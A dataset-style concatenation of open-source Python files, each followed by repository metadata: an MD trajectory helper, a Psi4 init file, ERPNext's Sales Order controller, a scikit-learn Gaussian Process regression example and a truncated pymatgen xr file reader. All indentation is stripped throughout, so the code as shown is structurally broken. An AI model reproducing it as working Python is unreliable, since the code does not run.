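#   script = makepdb('mysys', 'mysys.prmtop', 'mysys.nc')
#   # -> cpptraj input that centers, RMS-fits to the first frame, strips
#   #    water and ions, and writes mysys.pdb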
if __name__ == "__main__":
if len(sys.argv) < 4:
print __doc__
exit()
title = sys.argv[1]
parm = sys.argv[2]
mdtrj = sys.argv[3]
script = makepdb(title,parm,mdtrj)
with open('getpdb.cpptraj','w') as outfile:
print "Writing getpdb file"
outfile.write(script)
|
avishek-r-kumar/dfitools
|
MD_DFI_analysis/makepdb.py
|
Python
|
bsd-3-clause
| 787
|
[
"MDTraj"
] |
7ddbd25e54838822d770833142b5013e6127082e1207b99d771ec6aa9c780c41
|
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2022 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This file is part of Psi4.
#
# Psi4 is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3.
#
# Psi4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with Psi4; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
from .mcscf_solver import mcscf_solver
|
psi4/psi4
|
psi4/driver/procrouting/mcscf/__init__.py
|
Python
|
lgpl-3.0
| 953
|
[
"Psi4"
] |
97f635de6e6cc1a6fe4487c195f342a11f6b83f0d3cf577804961c69f6f7f352
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
import json
import frappe.utils
from frappe.utils import cstr, flt, getdate, comma_and, cint
from frappe import _
from frappe.model.utils import get_fetch_values
from frappe.model.mapper import get_mapped_doc
from erpnext.stock.stock_balance import update_bin_qty, get_reserved_qty
from frappe.desk.notifications import clear_doctype_notifications
from frappe.contacts.doctype.address.address import get_company_address
from erpnext.controllers.selling_controller import SellingController
from erpnext.subscription.doctype.subscription.subscription import month_map, get_next_date
form_grid_templates = {
"items": "templates/form_grid/item_grid.html"
}
class WarehouseRequired(frappe.ValidationError): pass
class SalesOrder(SellingController):
def __init__(self, arg1, arg2=None):
super(SalesOrder, self).__init__(arg1, arg2)
def validate(self):
super(SalesOrder, self).validate()
self.validate_order_type()
self.validate_delivery_date()
self.validate_proj_cust()
self.validate_po()
self.validate_uom_is_integer("stock_uom", "stock_qty")
self.validate_uom_is_integer("uom", "qty")
self.validate_for_items()
self.validate_warehouse()
self.validate_drop_ship()
from erpnext.stock.doctype.packed_item.packed_item import make_packing_list
make_packing_list(self)
self.validate_with_previous_doc()
self.set_status()
if not self.billing_status: self.billing_status = 'Not Billed'
if not self.delivery_status: self.delivery_status = 'Not Delivered'
def validate_po(self):
# validate PO date vs. delivery date
if self.po_date:
for d in self.get("items"):
if d.delivery_date and getdate(self.po_date) > getdate(d.delivery_date):
frappe.throw(_("Row #{0}: Expected Delivery Date cannot be before Purchase Order Date")
.format(d.idx))
if self.po_no and self.customer:
so = frappe.db.sql("select name from `tabSales Order` \
where ifnull(po_no, '') = %s and name != %s and docstatus < 2\
and customer = %s", (self.po_no, self.name, self.customer))
if so and so[0][0] and not cint(frappe.db.get_single_value("Selling Settings",
"allow_against_multiple_purchase_orders")):
frappe.msgprint(_("Warning: Sales Order {0} already exists against Customer's Purchase Order {1}").format(so[0][0], self.po_no))
def validate_for_items(self):
check_list = []
for d in self.get('items'):
check_list.append(cstr(d.item_code))
# used for production plan
d.transaction_date = self.transaction_date
tot_avail_qty = frappe.db.sql("select projected_qty from `tabBin` \
where item_code = %s and warehouse = %s", (d.item_code, d.warehouse))
d.projected_qty = tot_avail_qty and flt(tot_avail_qty[0][0]) or 0
# check for same entry multiple times
unique_chk_list = set(check_list)
if len(unique_chk_list) != len(check_list) and \
not cint(frappe.db.get_single_value("Selling Settings", "allow_multiple_items")):
frappe.msgprint(_("Same item has been entered multiple times"),
title=_("Warning"), indicator='orange')
def product_bundle_has_stock_item(self, product_bundle):
"""Returns true if product bundle has stock item"""
ret = len(frappe.db.sql("""select i.name from tabItem i, `tabProduct Bundle Item` pbi
where pbi.parent = %s and pbi.item_code = i.name and i.is_stock_item = 1""", product_bundle))
return ret
def validate_sales_mntc_quotation(self):
for d in self.get('items'):
if d.prevdoc_docname:
res = frappe.db.sql("select name from `tabQuotation` where name=%s and order_type = %s",
(d.prevdoc_docname, self.order_type))
if not res:
frappe.msgprint(_("Quotation {0} not of type {1}")
.format(d.prevdoc_docname, self.order_type))
def validate_order_type(self):
super(SalesOrder, self).validate_order_type()
def validate_delivery_date(self):
if self.order_type == 'Sales':
if not self.delivery_date:
self.delivery_date = max([d.delivery_date for d in self.get("items")])
if self.delivery_date:
for d in self.get("items"):
if not d.delivery_date:
d.delivery_date = self.delivery_date
if getdate(self.transaction_date) > getdate(d.delivery_date):
frappe.msgprint(_("Expected Delivery Date should be after Sales Order Date"),
indicator='orange', title=_('Warning'))
else:
frappe.throw(_("Please enter Delivery Date"))
self.validate_sales_mntc_quotation()
def validate_proj_cust(self):
if self.project and self.customer_name:
res = frappe.db.sql("""select name from `tabProject` where name = %s
and (customer = %s or ifnull(customer,'')='')""",
(self.project, self.customer))
if not res:
frappe.throw(_("Customer {0} does not belong to project {1}").format(self.customer, self.project))
def validate_warehouse(self):
super(SalesOrder, self).validate_warehouse()
for d in self.get("items"):
if (frappe.db.get_value("Item", d.item_code, "is_stock_item") == 1 or
(self.has_product_bundle(d.item_code) and self.product_bundle_has_stock_item(d.item_code))) \
and not d.warehouse and not cint(d.delivered_by_supplier):
frappe.throw(_("Delivery warehouse required for stock item {0}").format(d.item_code),
WarehouseRequired)
def validate_with_previous_doc(self):
super(SalesOrder, self).validate_with_previous_doc({
"Quotation": {
"ref_dn_field": "prevdoc_docname",
"compare_fields": [["company", "="], ["currency", "="]]
}
})
def update_enquiry_status(self, prevdoc, flag):
enq = frappe.db.sql("select t2.prevdoc_docname from `tabQuotation` t1, `tabQuotation Item` t2 where t2.parent = t1.name and t1.name=%s", prevdoc)
if enq:
frappe.db.sql("update `tabOpportunity` set status = %s where name=%s",(flag,enq[0][0]))
def update_prevdoc_status(self, flag):
for quotation in list(set([d.prevdoc_docname for d in self.get("items")])):
if quotation:
doc = frappe.get_doc("Quotation", quotation)
if doc.docstatus==2:
frappe.throw(_("Quotation {0} is cancelled").format(quotation))
doc.set_status(update=True)
doc.update_opportunity()
def validate_drop_ship(self):
for d in self.get('items'):
if d.delivered_by_supplier and not d.supplier:
frappe.throw(_("Row #{0}: Set Supplier for item {1}").format(d.idx, d.item_code))
def on_submit(self):
self.check_credit_limit()
self.update_reserved_qty()
frappe.get_doc('Authorization Control').validate_approving_authority(self.doctype, self.company, self.base_grand_total, self)
self.update_project()
self.update_prevdoc_status('submit')
def on_cancel(self):
# Cannot cancel closed SO
if self.status == 'Closed':
frappe.throw(_("Closed order cannot be cancelled. Unclose to cancel."))
self.check_nextdoc_docstatus()
self.update_reserved_qty()
self.update_project()
self.update_prevdoc_status('cancel')
frappe.db.set(self, 'status', 'Cancelled')
def update_project(self):
project_list = []
if self.project:
project = frappe.get_doc("Project", self.project)
project.flags.dont_sync_tasks = True
project.update_sales_costing()
project.save()
project_list.append(self.project)
def check_credit_limit(self):
from erpnext.selling.doctype.customer.customer import check_credit_limit
check_credit_limit(self.customer, self.company)
def check_nextdoc_docstatus(self):
# Checks Delivery Note
submit_dn = frappe.db.sql_list("""select t1.name from `tabDelivery Note` t1,`tabDelivery Note Item` t2
where t1.name = t2.parent and t2.against_sales_order = %s and t1.docstatus = 1""", self.name)
if submit_dn:
frappe.throw(_("Delivery Notes {0} must be cancelled before cancelling this Sales Order").format(comma_and(submit_dn)))
# Checks Sales Invoice
submit_rv = frappe.db.sql_list("""select t1.name
from `tabSales Invoice` t1,`tabSales Invoice Item` t2
where t1.name = t2.parent and t2.sales_order = %s and t1.docstatus = 1""",
self.name)
if submit_rv:
frappe.throw(_("Sales Invoice {0} must be cancelled before cancelling this Sales Order").format(comma_and(submit_rv)))
# check maintenance schedule
submit_ms = frappe.db.sql_list("""select t1.name from `tabMaintenance Schedule` t1,
`tabMaintenance Schedule Item` t2
where t2.parent=t1.name and t2.sales_order = %s and t1.docstatus = 1""", self.name)
if submit_ms:
frappe.throw(_("Maintenance Schedule {0} must be cancelled before cancelling this Sales Order").format(comma_and(submit_ms)))
# check maintenance visit
submit_mv = frappe.db.sql_list("""select t1.name from `tabMaintenance Visit` t1, `tabMaintenance Visit Purpose` t2
where t2.parent=t1.name and t2.prevdoc_docname = %s and t1.docstatus = 1""",self.name)
if submit_mv:
frappe.throw(_("Maintenance Visit {0} must be cancelled before cancelling this Sales Order").format(comma_and(submit_mv)))
# check production order
pro_order = frappe.db.sql_list("""select name from `tabProduction Order`
where sales_order = %s and docstatus = 1""", self.name)
if pro_order:
frappe.throw(_("Production Order {0} must be cancelled before cancelling this Sales Order").format(comma_and(pro_order)))
def check_modified_date(self):
mod_db = frappe.db.get_value("Sales Order", self.name, "modified")
date_diff = frappe.db.sql("select TIMEDIFF('%s', '%s')" %
( mod_db, cstr(self.modified)))
if date_diff and date_diff[0][0]:
frappe.throw(_("{0} {1} has been modified. Please refresh.").format(self.doctype, self.name))
def update_status(self, status):
self.check_modified_date()
self.set_status(update=True, status=status)
self.update_reserved_qty()
self.notify_update()
clear_doctype_notifications(self)
def update_reserved_qty(self, so_item_rows=None):
"""update requested qty (before ordered_qty is updated)"""
item_wh_list = []
def _valid_for_reserve(item_code, warehouse):
if item_code and warehouse and [item_code, warehouse] not in item_wh_list \
and frappe.db.get_value("Item", item_code, "is_stock_item"):
item_wh_list.append([item_code, warehouse])
for d in self.get("items"):
if (not so_item_rows or d.name in so_item_rows) and not d.delivered_by_supplier:
if self.has_product_bundle(d.item_code):
for p in self.get("packed_items"):
if p.parent_detail_docname == d.name and p.parent_item == d.item_code:
_valid_for_reserve(p.item_code, p.warehouse)
else:
_valid_for_reserve(d.item_code, d.warehouse)
for item_code, warehouse in item_wh_list:
update_bin_qty(item_code, warehouse, {
"reserved_qty": get_reserved_qty(item_code, warehouse)
})
def on_update(self):
pass
def before_update_after_submit(self):
self.validate_po()
self.validate_drop_ship()
self.validate_supplier_after_submit()
def validate_supplier_after_submit(self):
"""Check that supplier is the same after submit if PO is already made"""
exc_list = []
for item in self.items:
if item.supplier:
supplier = frappe.db.get_value("Sales Order Item", {"parent": self.name, "item_code": item.item_code},
"supplier")
if item.ordered_qty > 0.0 and item.supplier != supplier:
exc_list.append(_("Row #{0}: Not allowed to change Supplier as Purchase Order already exists").format(item.idx))
if exc_list:
frappe.throw('\n'.join(exc_list))
def update_delivery_status(self):
"""Update delivery status from Purchase Order for drop shipping"""
tot_qty, delivered_qty = 0.0, 0.0
for item in self.items:
if item.delivered_by_supplier:
item_delivered_qty = frappe.db.sql("""select sum(qty)
from `tabPurchase Order Item` poi, `tabPurchase Order` po
where poi.sales_order_item = %s
and poi.item_code = %s
and poi.parent = po.name
and po.docstatus = 1
and po.status = 'Delivered'""", (item.name, item.item_code))
item_delivered_qty = item_delivered_qty[0][0] if item_delivered_qty else 0
item.db_set("delivered_qty", flt(item_delivered_qty), update_modified=False)
delivered_qty += item.delivered_qty
tot_qty += item.qty
self.db_set("per_delivered", flt(delivered_qty/tot_qty) * 100,
update_modified=False)
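# Worked example: with two drop-shipped items of qty 5 each and 5 units
# delivered in total, per_delivered is set to (5 / 10) * 100 = 50.0.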
def set_indicator(self):
"""Set indicator for portal"""
if self.per_billed < 100 and self.per_delivered < 100:
self.indicator_color = "orange"
self.indicator_title = _("Not Paid and Not Delivered")
elif self.per_billed == 100 and self.per_delivered < 100:
self.indicator_color = "orange"
self.indicator_title = _("Paid and Not Delivered")
else:
self.indicator_color = "green"
self.indicator_title = _("Paid")
def get_production_order_items(self):
'''Returns items with a BOM that do not already have a linked production order'''
items = []
for table in [self.items, self.packed_items]:
for i in table:
bom = get_default_bom_item(i.item_code)
if bom:
stock_qty = i.qty if i.doctype == 'Packed Item' else i.stock_qty
items.append(dict(
item_code= i.item_code,
bom = bom,
warehouse = i.warehouse,
pending_qty= stock_qty - flt(frappe.db.sql('''select sum(qty) from `tabProduction Order`
where production_item=%s and sales_order=%s''', (i.item_code, self.name))[0][0])
))
return items
def on_recurring(self, reference_doc, subscription_doc):
mcount = month_map[subscription_doc.frequency]
self.set("delivery_date", get_next_date(reference_doc.delivery_date, mcount,
cint(subscription_doc.repeat_on_day)))
for d in self.get("items"):
reference_delivery_date = frappe.db.get_value("Sales Order Item",
{"parent": reference_doc.name, "item_code": d.item_code, "idx": d.idx}, "delivery_date")
d.set("delivery_date",
get_next_date(reference_delivery_date, mcount, cint(subscription_doc.repeat_on_day)))
def get_list_context(context=None):
from erpnext.controllers.website_list_for_contact import get_list_context
list_context = get_list_context(context)
list_context.update({
'show_sidebar': True,
'show_search': True,
'no_breadcrumbs': True,
'title': _('Orders'),
})
return list_context
@frappe.whitelist()
def close_or_unclose_sales_orders(names, status):
if not frappe.has_permission("Sales Order", "write"):
frappe.throw(_("Not permitted"), frappe.PermissionError)
names = json.loads(names)
for name in names:
so = frappe.get_doc("Sales Order", name)
if so.docstatus == 1:
if status == "Closed":
if so.status not in ("Cancelled", "Closed") and (so.per_delivered < 100 or so.per_billed < 100):
so.update_status(status)
else:
if so.status == "Closed":
so.update_status('Draft')
frappe.local.message_log = []
@frappe.whitelist()
def make_material_request(source_name, target_doc=None):
def postprocess(source, doc):
doc.material_request_type = "Purchase"
def update_item(source, target, source_parent):
target.project = source_parent.project
doc = get_mapped_doc("Sales Order", source_name, {
"Sales Order": {
"doctype": "Material Request",
"validation": {
"docstatus": ["=", 1]
}
},
"Packed Item": {
"doctype": "Material Request Item",
"field_map": {
"parent": "sales_order",
"stock_uom": "uom"
},
"postprocess": update_item
},
"Sales Order Item": {
"doctype": "Material Request Item",
"field_map": {
"parent": "sales_order",
"stock_uom": "uom",
"stock_qty": "qty"
},
"condition": lambda doc: not frappe.db.exists('Product Bundle', doc.item_code),
"postprocess": update_item
}
}, target_doc, postprocess)
return doc
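# A minimal usage sketch (hypothetical Sales Order name):
#   mr = make_material_request("SO-00042")  # returns an unsaved mapped doc
#   mr.insert()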
@frappe.whitelist()
def make_project(source_name, target_doc=None):
def postprocess(source, doc):
doc.project_type = "External"
doc.project_name = source.name
doc = get_mapped_doc("Sales Order", source_name, {
"Sales Order": {
"doctype": "Project",
"validation": {
"docstatus": ["=", 1]
},
"field_map":{
"name" : "sales_order",
"base_grand_total" : "estimated_costing",
}
},
"Sales Order Item": {
"doctype": "Project Task",
"field_map": {
"description": "title",
},
}
}, target_doc, postprocess)
return doc
@frappe.whitelist()
def make_delivery_note(source_name, target_doc=None):
def set_missing_values(source, target):
if source.po_no:
if target.po_no:
target_po_no = target.po_no.split(", ")
target_po_no.append(source.po_no)
target.po_no = ", ".join(list(set(target_po_no))) if len(target_po_no) > 1 else target_po_no[0]
else:
target.po_no = source.po_no
target.ignore_pricing_rule = 1
target.run_method("set_missing_values")
target.run_method("calculate_taxes_and_totals")
# set company address
target.update(get_company_address(target.company))
if target.company_address:
target.update(get_fetch_values("Delivery Note", 'company_address', target.company_address))
def update_item(source, target, source_parent):
target.base_amount = (flt(source.qty) - flt(source.delivered_qty)) * flt(source.base_rate)
target.amount = (flt(source.qty) - flt(source.delivered_qty)) * flt(source.rate)
target.qty = flt(source.qty) - flt(source.delivered_qty)
item = frappe.db.get_value("Item", target.item_code, ["item_group", "selling_cost_center"], as_dict=1)
target.cost_center = frappe.db.get_value("Project", source_parent.project, "cost_center") \
or item.selling_cost_center \
or frappe.db.get_value("Item Group", item.item_group, "default_cost_center")
target_doc = get_mapped_doc("Sales Order", source_name, {
"Sales Order": {
"doctype": "Delivery Note",
"validation": {
"docstatus": ["=", 1]
}
},
"Sales Order Item": {
"doctype": "Delivery Note Item",
"field_map": {
"rate": "rate",
"name": "so_detail",
"parent": "against_sales_order",
},
"postprocess": update_item,
"condition": lambda doc: abs(doc.delivered_qty) < abs(doc.qty) and doc.delivered_by_supplier!=1
},
"Sales Taxes and Charges": {
"doctype": "Sales Taxes and Charges",
"add_if_empty": True
},
"Sales Team": {
"doctype": "Sales Team",
"add_if_empty": True
}
}, target_doc, set_missing_values)
return target_doc
@frappe.whitelist()
def make_sales_invoice(source_name, target_doc=None, ignore_permissions=False):
def postprocess(source, target):
set_missing_values(source, target)
# Get the advance paid Journal Entries in Sales Invoice Advance
target.set_advances()
def set_missing_values(source, target):
target.is_pos = 0
target.ignore_pricing_rule = 1
target.flags.ignore_permissions = True
target.run_method("set_missing_values")
target.run_method("calculate_taxes_and_totals")
# set company address
target.update(get_company_address(target.company))
if target.company_address:
target.update(get_fetch_values("Sales Invoice", 'company_address', target.company_address))
def update_item(source, target, source_parent):
target.amount = flt(source.amount) - flt(source.billed_amt)
target.base_amount = target.amount * flt(source_parent.conversion_rate)
target.qty = target.amount / flt(source.rate) if (source.rate and source.billed_amt) else source.qty
item = frappe.db.get_value("Item", target.item_code, ["item_group", "selling_cost_center"], as_dict=1)
target.cost_center = frappe.db.get_value("Project", source_parent.project, "cost_center") \
or item.selling_cost_center \
or frappe.db.get_value("Item Group", item.item_group, "default_cost_center")
doclist = get_mapped_doc("Sales Order", source_name, {
"Sales Order": {
"doctype": "Sales Invoice",
"field_map": {
"party_account_currency": "party_account_currency"
},
"validation": {
"docstatus": ["=", 1]
}
},
"Sales Order Item": {
"doctype": "Sales Invoice Item",
"field_map": {
"name": "so_detail",
"parent": "sales_order",
},
"postprocess": update_item,
"condition": lambda doc: doc.qty and (doc.base_amount==0 or abs(doc.billed_amt) < abs(doc.amount))
},
"Sales Taxes and Charges": {
"doctype": "Sales Taxes and Charges",
"add_if_empty": True
},
"Sales Team": {
"doctype": "Sales Team",
"add_if_empty": True
}
}, target_doc, postprocess, ignore_permissions=ignore_permissions)
return doclist
@frappe.whitelist()
def make_maintenance_schedule(source_name, target_doc=None):
maint_schedule = frappe.db.sql("""select t1.name
from `tabMaintenance Schedule` t1, `tabMaintenance Schedule Item` t2
where t2.parent=t1.name and t2.sales_order=%s and t1.docstatus=1""", source_name)
if not maint_schedule:
doclist = get_mapped_doc("Sales Order", source_name, {
"Sales Order": {
"doctype": "Maintenance Schedule",
"validation": {
"docstatus": ["=", 1]
}
},
"Sales Order Item": {
"doctype": "Maintenance Schedule Item",
"field_map": {
"parent": "sales_order"
},
"add_if_empty": True
}
}, target_doc)
return doclist
@frappe.whitelist()
def make_maintenance_visit(source_name, target_doc=None):
visit = frappe.db.sql("""select t1.name
from `tabMaintenance Visit` t1, `tabMaintenance Visit Purpose` t2
where t2.parent=t1.name and t2.prevdoc_docname=%s
and t1.docstatus=1 and t1.completion_status='Fully Completed'""", source_name)
if not visit:
doclist = get_mapped_doc("Sales Order", source_name, {
"Sales Order": {
"doctype": "Maintenance Visit",
"validation": {
"docstatus": ["=", 1]
}
},
"Sales Order Item": {
"doctype": "Maintenance Visit Purpose",
"field_map": {
"parent": "prevdoc_docname",
"parenttype": "prevdoc_doctype"
},
"add_if_empty": True
}
}, target_doc)
return doclist
@frappe.whitelist()
def get_events(start, end, filters=None):
"""Returns events for Gantt / Calendar view rendering.
:param start: Start date-time.
:param end: End date-time.
:param filters: Filters (JSON).
"""
from frappe.desk.calendar import get_event_conditions
conditions = get_event_conditions("Sales Order", filters)
data = frappe.db.sql("""
select
`tabSales Order`.name, `tabSales Order`.customer_name, `tabSales Order`.status,
`tabSales Order`.delivery_status, `tabSales Order`.billing_status,
`tabSales Order Item`.delivery_date
from
`tabSales Order`, `tabSales Order Item`
where `tabSales Order`.name = `tabSales Order Item`.parent
and (ifnull(`tabSales Order Item`.delivery_date, '0000-00-00')!= '0000-00-00') \
and (`tabSales Order Item`.delivery_date between %(start)s and %(end)s)
and `tabSales Order`.docstatus < 2
{conditions}
""".format(conditions=conditions), {
"start": start,
"end": end
}, as_dict=True, update={"allDay": 0})
return data
@frappe.whitelist()
def make_purchase_order_for_drop_shipment(source_name, for_supplier, target_doc=None):
def set_missing_values(source, target):
target.supplier = for_supplier
target.apply_discount_on = ""
target.additional_discount_percentage = 0.0
target.discount_amount = 0.0
default_price_list = frappe.get_value("Supplier", for_supplier, "default_price_list")
if default_price_list:
target.buying_price_list = default_price_list
if any(item.delivered_by_supplier == 1 for item in source.items):
if source.shipping_address_name:
target.shipping_address = source.shipping_address_name
target.shipping_address_display = source.shipping_address
else:
target.shipping_address = source.customer_address
target.shipping_address_display = source.address_display
target.customer_contact_person = source.contact_person
target.customer_contact_display = source.contact_display
target.customer_contact_mobile = source.contact_mobile
target.customer_contact_email = source.contact_email
else:
target.customer = ""
target.customer_name = ""
target.run_method("set_missing_values")
target.run_method("calculate_taxes_and_totals")
def update_item(source, target, source_parent):
target.schedule_date = source.delivery_date
target.qty = flt(source.qty) - flt(source.ordered_qty)
target.stock_qty = (flt(source.qty) - flt(source.ordered_qty)) * flt(source.conversion_factor)
doclist = get_mapped_doc("Sales Order", source_name, {
"Sales Order": {
"doctype": "Purchase Order",
"field_no_map": [
"address_display",
"contact_display",
"contact_mobile",
"contact_email",
"contact_person"
],
"validation": {
"docstatus": ["=", 1]
}
},
"Sales Order Item": {
"doctype": "Purchase Order Item",
"field_map": [
["name", "sales_order_item"],
["parent", "sales_order"],
["stock_uom", "stock_uom"],
["uom", "uom"],
["conversion_factor", "conversion_factor"],
["delivery_date", "schedule_date"]
],
"field_no_map": [
"rate",
"price_list_rate"
],
"postprocess": update_item,
"condition": lambda doc: doc.ordered_qty < doc.qty and doc.supplier == for_supplier
}
}, target_doc, set_missing_values)
return doclist
@frappe.whitelist()
def get_supplier(doctype, txt, searchfield, start, page_len, filters):
supp_master_name = frappe.defaults.get_user_default("supp_master_name")
if supp_master_name == "Supplier Name":
fields = ["name", "supplier_type"]
else:
fields = ["name", "supplier_name", "supplier_type"]
fields = ", ".join(fields)
return frappe.db.sql("""select {field} from `tabSupplier`
where docstatus < 2
and ({key} like %(txt)s
or supplier_name like %(txt)s)
and name in (select supplier from `tabSales Order Item` where parent = %(parent)s)
order by
if(locate(%(_txt)s, name), locate(%(_txt)s, name), 99999),
if(locate(%(_txt)s, supplier_name), locate(%(_txt)s, supplier_name), 99999),
name, supplier_name
limit %(start)s, %(page_len)s """.format(**{
'field': fields,
'key': frappe.db.escape(searchfield)
}), {
'txt': "%%%s%%" % txt,
'_txt': txt.replace("%", ""),
'start': start,
'page_len': page_len,
'parent': filters.get('parent')
})
@frappe.whitelist()
def make_production_orders(items, sales_order, company, project=None):
'''Make Production Orders against the given Sales Order for the given `items`'''
items = json.loads(items).get('items')
out = []
for i in items:
production_order = frappe.get_doc(dict(
doctype='Production Order',
production_item=i['item_code'],
bom_no=i['bom'],
qty=i['pending_qty'],
company=company,
sales_order=sales_order,
project=project,
fg_warehouse=i['warehouse']
)).insert()
production_order.set_production_order_operations()
production_order.save()
out.append(production_order)
return [p.name for p in out]
@frappe.whitelist()
def update_status(status, name):
so = frappe.get_doc("Sales Order", name)
so.update_status(status)
def get_default_bom_item(item_code):
bom = frappe.get_all('BOM', dict(item=item_code, is_active=True),
order_by='is_default desc')
bom = bom[0].name if bom else None
return bom
|
mbauskar/erpnext
|
erpnext/selling/doctype/sales_order/sales_order.py
|
Python
|
gpl-3.0
| 26,900
|
[
"VisIt"
] |
56e63d59c7e9580fe704c24056291a5ea9802d6594962784321403a7f25c871b
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
========================================================================
Gaussian Processes regression: goodness-of-fit on the 'diabetes' dataset
========================================================================
This example fits a Gaussian Process model to the diabetes dataset.
The correlation parameters are determined by means of maximum likelihood
estimation (MLE). An anisotropic absolute exponential correlation model and a
constant regression model are assumed. We also use a nugget of 1e-2 to
account for the (strong) noise in the targets.
We then compute a cross-validation estimate of the coefficient of
determination (R2) without re-performing MLE, using the set of correlation
parameters found on the whole dataset.
"""
print(__doc__)
# Author: Vincent Dubourg <vincent.dubourg@gmail.com>
# Licence: BSD 3 clause
from sklearn import datasets
from sklearn.gaussian_process import GaussianProcess
from sklearn.cross_validation import cross_val_score, KFold
# Load the dataset from scikit's data sets
diabetes = datasets.load_diabetes()
X, y = diabetes.data, diabetes.target
# Instantiate a GP model
gp = GaussianProcess(regr='constant', corr='absolute_exponential',
theta0=[1e-4] * 10, thetaL=[1e-12] * 10,
thetaU=[1e-2] * 10, nugget=1e-2, optimizer='Welch')
# Fit the GP model to the data performing maximum likelihood estimation
gp.fit(X, y)
# Deactivate maximum likelihood estimation for the cross-validation loop
gp.theta0 = gp.theta_ # Given correlation parameter = MLE
gp.thetaL, gp.thetaU = None, None # None bounds deactivate MLE
# Perform a cross-validation estimate of the coefficient of determination
# using the cross_validation module (n_jobs=1, i.e. a single CPU)
K = 20 # folds
R2 = cross_val_score(gp, X, y=y, cv=KFold(y.size, K), n_jobs=1).mean()
print("The %d-Folds estimate of the coefficient of determination is R2 = %s"
% (K, R2))
|
RPGOne/Skynet
|
scikit-learn-c604ac39ad0e5b066d964df3e8f31ba7ebda1e0e/examples/gaussian_process/gp_diabetes_dataset.py
|
Python
|
bsd-3-clause
| 2,021
|
[
"Gaussian"
] |
56f467e5f041de3a4caf83fb15f45f6c5003d8a4d96effbab8d5df8eab043996
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
from __future__ import division, unicode_literals
"""
This module provides input and output mechanisms
for the xr file format, which is a modified CSSR
file format and, for example, used in GULP.
In particular, the module makes it easy
to remove shell positions from relaxations
that employed core-shell models.
"""
__author__ = "Nils Edvin Richard Zimmermann"
__copyright__ = "Copyright 2016, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Nils Edvin Richard Zimmermann"
__email__ = "nils.e.r.zimmermann@gmail.com"
__date__ = "June 23, 2016"
import re
from six.moves import map
import numpy as np
from monty.io import zopen
from math import fabs
from pymatgen.core.lattice import Lattice
from pymatgen.core.structure import Structure
class Xr(object):
"""
Basic object for working with xr files.
Args:
structure (Structure/IStructure): Structure object to create the
Xr object.
"""
def __init__(self, structure):
if not structure.is_ordered:
raise ValueError("Xr file can only be constructed from ordered "
"structure")
self.structure = structure
def __str__(self):
output = ["pymatgen {:.4f} {:.4f} {:.4f}"
.format(*self.structure.lattice.abc),
"{:.3f} {:.3f} {:.3f}"
.format(*self.structure.lattice.angles),
"{} 0".format(len(self.structure)),
"0 {}".format(self.structure.formula)]
# There are actually 10 more fields per site
# in a typical xr file from GULP, for example.
for i, site in enumerate(self.structure.sites):
output.append("{} {} {:.4f} {:.4f} {:.4f}"
.format(i + 1, site.specie, site.x, site.y, site.z))
mat = self.structure.lattice.matrix
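# Note: the xr format stores the cell vectors twice; from_string() below
# checks that both copies agree.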
for i in range(2):
for j in range(3):
output.append("{:.4f} {:.4f} {:.4f}".format(
mat[j][0], mat[j][1], mat[j][2]))
return "\n".join(output)
def write_file(self, filename):
"""
Write out an xr file.
Args:
filename (str): name of the file to write to.
"""
with zopen(filename, 'wt') as f:
f.write(str(self) + "\n")
@staticmethod
def from_string(string, use_cores=True, thresh=1.e-4):
"""
Creates an Xr object from a string representation.
Args:
string (str): string representation of an Xr object.
use_cores (bool): use core positions and discard shell
positions if set to True (default). Otherwise,
use shell positions and discard core positions.
thresh (float): relative threshold for consistency check
between cell parameters (lengths and angles) from
header information and cell vectors, respectively.
Returns:
xr (Xr): Xr object corresponding to the input
string representation.
"""
lines = string.split("\n")
toks = lines[0].split()
lengths = [float(toks[i]) for i in range(1, len(toks))]
toks = lines[1].split()
angles = [float(i) for i in toks[0:3]]
toks = lines[2].split()
nsites = int(toks[0])
        mat = np.zeros((3, 3), dtype=float)
for i in range(3):
toks = lines[4+nsites+i].split()
toks2 = lines[4+nsites+i+3].split()
for j, item in enumerate(toks):
if item != toks2[j]:
raise RuntimeError("expected both matrices"
" to be the same in xr file")
mat[i] = np.array([float(w) for w in toks])
lat = Lattice(mat)
if fabs(lat.a-lengths[0])/fabs(lat.a) > thresh or \
fabs(lat.b-lengths[1])/fabs(lat.b) > thresh or \
fabs(lat.c-lengths[2])/fabs(lat.c) > thresh or \
fabs(lat.alpha-angles[0])/fabs(lat.alpha) > thresh or \
fabs(lat.beta-angles[1])/fabs(lat.beta) > thresh or \
fabs(lat.gamma-angles[2])/fabs(lat.gamma) > thresh:
raise RuntimeError("cell parameters in header ("+str(lengths)+\
", "+str(angles)+") are not consistent with Cartesian"+\
" lattice vectors ("+str(lat.abc)+", "+\
str(lat.angles)+")")
# Ignore line w/ index 3.
sp = []
coords = []
for j in range(nsites):
            m = re.match(r"\d+\s+(\w+)\s+([0-9\-\.]+)\s+([0-9\-\.]+)\s+"
                         r"([0-9\-\.]+)", lines[4+j].strip())
if m:
tmp_sp = m.group(1)
                if use_cores and tmp_sp.endswith("_s"):
                    continue
                if not use_cores and tmp_sp.endswith("_c"):
                    continue
                if tmp_sp[len(tmp_sp) - 2] == "_":
                    sp.append(tmp_sp[0:len(tmp_sp) - 2])
                else:
                    sp.append(tmp_sp)
coords.append([float(m.group(i)) for i in range(2, 5)])
return Xr(Structure(lat, sp, coords, coords_are_cartesian=True))
@staticmethod
def from_file(filename, use_cores=True, thresh=1.e-4):
"""
Reads an xr-formatted file to create an Xr object.
Args:
filename (str): name of file to read from.
use_cores (bool): use core positions and discard shell
positions if set to True (default). Otherwise,
use shell positions and discard core positions.
thresh (float): relative threshold for consistency check
between cell parameters (lengths and angles) from
